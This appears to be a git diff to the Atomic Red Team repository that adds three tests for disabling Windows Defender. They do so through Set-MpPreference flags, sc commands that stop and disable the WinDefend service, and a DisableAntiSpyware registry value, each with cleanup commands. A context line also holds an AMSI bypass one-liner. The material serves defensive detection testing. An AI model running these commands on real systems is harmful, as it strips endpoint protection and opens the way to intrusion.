diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 7e5d3176..cf9cafcb 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -34,6 +34,12 @@
- [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface)
+- [Atomic Test #16 - Tamper with Windows Defender ATP PowerShell](#atomic-test-16---tamper-with-windows-defender-atp-powershell)
+
+- [Atomic Test #17 - Tamper with Windows Defender Command Prompt](#atomic-test-17---tamper-with-windows-defender-command-prompt)
+
+- [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry)
+
@@ -369,4 +375,73 @@ Credit to Matt Graeber (@mattifestation) for the research.
+
+
+
+## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
+Attempting to disable scheduled scanning and other parts of windows defender atp
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
+```
+Set-MpPreference -DisableRealtimeMonitoring 1
+Set-MpPreference -DisableBehaviorMonitoring 1
+Set-MpPreference -DisableScriptScanning 1
+Set-MpPreference -DisableBlockAtFirstSeen 1
+```
+
+
+#### Cleanup Commands:
+```
+Set-MpPreference -DisableRealtimeMonitoring 0
+Set-MpPreference -DisableBehaviorMonitoring 0
+Set-MpPreference -DisableScriptScanning 0
+Set-MpPreference -DisableBlockAtFirstSeen 0
+```
+
+
+
+
+## Atomic Test #17 - Tamper with Windows Defender Command Prompt
+Attempting to disable scheduled scanning and other parts of windows defender atp
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+```
+sc stop WinDefend
+sc config WinDefend start=disabled
+sc query WinDefend
+```
+
+
+#### Cleanup Commands:
+```
+sc start WinDefend
+sc config WinDefend start=enabled
+```
+
+
+
+
+## Atomic Test #18 - Tamper with Windows Defender Registry
+Disable Windows Defender from starting after a reboot
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
+```
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
+```
+
+
+#### Cleanup Commands:
+```
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
+```
+
diff --git a/atomics/index.md b/atomics/index.md
index 3271778c..277be38f 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -218,6 +218,9 @@
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #14: Disable PowerShell Script Block Logging [windows]
- Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
+ - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+ - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+ - Atomic Test #18: Tamper with Windows Defender Registry [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 5865102f..f2ca259b 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -7386,6 +7386,60 @@ defense-evasion:
elevation_required: false
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
+'
+ - name: Tamper with Windows Defender ATP PowerShell
+ description: 'Attempting to disable scheduled scanning and other parts of windows
+ defender atp
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: true
+ command: |
+ Set-MpPreference -DisableRealtimeMonitoring 1
+ Set-MpPreference -DisableBehaviorMonitoring 1
+ Set-MpPreference -DisableScriptScanning 1
+ Set-MpPreference -DisableBlockAtFirstSeen 1
+ cleanup_command: |
+ Set-MpPreference -DisableRealtimeMonitoring 0
+ Set-MpPreference -DisableBehaviorMonitoring 0
+ Set-MpPreference -DisableScriptScanning 0
+ Set-MpPreference -DisableBlockAtFirstSeen 0
+ - name: Tamper with Windows Defender Command Prompt
+ description: 'Attempting to disable scheduled scanning and other parts of windows
+ defender atp
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ sc stop WinDefend
+ sc config WinDefend start=disabled
+ sc query WinDefend
+ cleanup_command: |
+ sc start WinDefend
+ sc config WinDefend start=enabled
+ - name: Tamper with Windows Defender Registry
+ description: 'Disable Windows Defender from starting after a reboot
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: true
+ command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
+ -Name DisableAntiSpyware -Value 1
+
+'
+ cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
+ Defender" -Name DisableAntiSpyware -Value 0
+
'
T1107:
technique:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 30a5ce96..b9d3f405 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -48,6 +48,9 @@
- Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #14: Disable PowerShell Script Block Logging [windows]
- Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
+ - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+ - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+ - Atomic Test #18: Tamper with Windows Defender Registry [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)